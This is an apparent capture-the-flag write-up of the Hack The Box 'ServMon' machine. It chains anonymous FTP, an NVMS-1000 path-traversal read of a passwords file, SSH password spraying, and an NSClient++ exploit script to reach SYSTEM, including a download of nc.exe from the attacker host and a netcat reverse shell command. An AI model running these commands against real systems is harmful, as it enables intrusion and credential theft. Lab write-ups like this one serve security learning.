ServMon Writeup

19 February 2023 #CTF #HTB #box #easy

servmon info

Enumeration

You already know, it's nmap time:

$ sudo nmap -n -Pn -sCV -oN enum/initial.nmap 10.10.10.184
[...]
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  06:35PM       <DIR>          Users
22/tcp   open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c71af681ca1778d027dbcd462a092b54 (RSA)
|   256 3e63ef3b6e3e4a90f34c02e940672e42 (ECDSA)
|_  256 5a48c8cd39782129effbae821d03adaf (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-02-10T13:38:45
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
[...]

FTP

As nmap told us, we can login anonymously to this FTP server. Inside the Users folder, there are 2 other folders:

ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49685|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM       <DIR>          Nadine
02-28-22  06:37PM       <DIR>          Nathan

Two potential usernames. Looking in Nadine's directory, there is just one text file:

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

Okay, it seems like there is a file called Passwords.txt in Nathan's desktop.

In Nathan's directory there is also one text file:

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

SMB

Unlike with FTP, we can't access SMB anonymously:

$ smbclient -NL 10.10.10.184
session setup failed: NT_STATUS_ACCESS_DENIED
$ rpcclient -U '%' -N 10.10.10.184
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

HTTP

Port 80

We get a login page:

NVMS-1000 login

It is pointless to try default credentials as stated in the file in Nathan's FTP folder (He changed the password).

Port 8443

Here we (are supposed to) have a network monitoring application:

NSClient++

The page was kinda broken for me.

Foothold

LFI in NVMS-1000

Looking for known vulnerabilities in NVMS-1000, we come across a LFI in the URL.

Let's see if it works by trying to get the Password.txt file on Nathan's desktop:

$ curl -s --path-as-is 'http://10.10.10.184/../../../../../../../../../../../../users/nathan/desktop/passwords.txt'
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Nice, we get a bunch of passwords!

Password Spraying

With a password list and 2 usernames, we can try spraying these passwords against each username and hope for the best. SSH is listening on this Windows box so we'll try it first:

$ cme ssh 10.10.10.184 -u users.txt -p passwords.txt
SSH         10.10.10.184    22     10.10.10.184     [*] SSH-2.0-OpenSSH_for_Windows_8.0
SSH         10.10.10.184    22     10.10.10.184     [-] Nadine:1nsp3ctTh3Way2Mars! Authentication failed.
SSH         10.10.10.184    22     10.10.10.184     [-] Nadine:Th3r34r3To0M4nyTrait0r5! Authentication failed.
SSH         10.10.10.184    22     10.10.10.184     [-] Nadine:B3WithM30r4ga1n5tMe Authentication failed.
SSH         10.10.10.184    22     10.10.10.184     [+] Nadine:L1k3B1gBut7s@W0rk

Great, we can log in as Nadine.

Privesc

We can find the NSClient++ config file in C:\Program Files\NSClient++\nsclient.ini:

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
[...]
; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
[...]

We get the password used to access the application and we learn that only localhost is allowed. That means even with the correct password, we can't access it from our attack box (it was also referenced in Nathan's file inside the FTP server).

Luckily, we can use SSH to forward a local port:

$ ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
nadine@10.10.10.184's password:
[...]

This will open port 8443 on our attack box and forward it to port 8443 on the remote box (on the localhost interface).

We can use this exploit script to create a custom script in NSClient++ that will get executed by NT AUTHORITY\SYSTEM:

$ ./cve.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c 'ping -n 2 10.10.14.4'
[!] Targeting base URL https://127.0.0.1:8443
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Enabling External Scripts Module . . .
[!] Configuring Script with Specified Payload . . .
[+] Added External Script (name: PFvFSEzz)
[!] Saving Configuration . . .
[!] Reloading Application . . .
[!] Waiting for Application to reload . . .
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Triggering payload, should execute shortly . . .

After a few seconds we get something in tcpdump:

$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:01:24.046322 IP 10.10.10.184 > 10.10.14.4: ICMP echo request, id 1, seq 1, length 40
14:01:24.046364 IP 10.10.14.4 > 10.10.10.184: ICMP echo reply, id 1, seq 1, length 40
14:01:25.131476 IP 10.10.10.184 > 10.10.14.4: ICMP echo request, id 1, seq 2, length 40
14:01:25.131501 IP 10.10.14.4 > 10.10.10.184: ICMP echo reply, id 1, seq 2, length 40

This confirms we can indeed execute code.

To get a reverse shell we'll upload nc.exe to the box:

nadine@SERVMON C:\Users\Nadine\Downloads>curl.exe 10.10.14.4/nc.exe -O
[...]

And now we can just execute it via the exploit script:

$ ./cve.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c 'C:\Users\Nadine\Downloads\nc.exe 10.10.14.4 443 -e cmd.exe'
[...]

Again, wait a few seconds and enjoy the reverse shell as NT AUTHORITY\SYSTEM:

$ nc -lnvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.184.
Ncat: Connection from 10.10.10.184:50613.
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

Key Takeaways